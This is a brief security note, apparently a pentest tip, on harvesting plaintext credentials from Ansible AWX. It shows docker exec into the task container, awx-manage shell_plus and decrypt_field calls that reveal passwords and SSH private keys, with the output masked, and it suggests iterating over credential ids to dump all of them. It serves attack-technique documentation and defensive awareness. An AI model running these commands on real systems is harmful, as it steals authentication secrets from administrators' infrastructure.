Ansible AWX

Ansible AWX is the open-source equivalent of the commercial Ansible Tower. AWX provides a web-based user interface, REST API, and task engine built on top of Ansible. It is one of the upstream projects for Red Hat Ansible Automation Platform.

Ansible AWX installations come with three default Docker containers: one for the web interface, one for its database, and one for performing tasks (known as Jobs).

One notable feature is 'Credentials', which enables administrators to store credentials, private keys, and other sensitive information that Ansible AWX uses for authentication when launching Jobs against remote machines.

Ansible AWX uses SSH to connect to remote hosts (or the Windows equivalent) and no matter what type of secret (private key, password, etc.) is used, the secret needs to be decrypted before connecting to the remote host. This decrypt function can be used maliciously to harvest all saved credentials in plaintext.

Credential Harvesting Example

The decrypt_field utility can extract plaintext credentials:

N/APYTHON

[root@victimHost ~]# docker exec -it awx_task /bin/bash
bash-4.4# awx-manage shell_plus
>>> from awx.main.utils import decrypt_field
>>> creds = Credential.objects.get(name="vSphere-01")
>>> print(decrypt_field(creds, "password"))
H************************
 
>>> creds = Credential.objects.get(name="admin-id_rsa")
>>> print(decrypt_field(creds, "ssh_key_data"))
-----BEGIN RSA PRIVATE KEY-----
M************************

By modifying the query parameter from name to id, an attacker could iterate through and decrypt all stored credentials in the system, including passwords and SSH private keys.

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝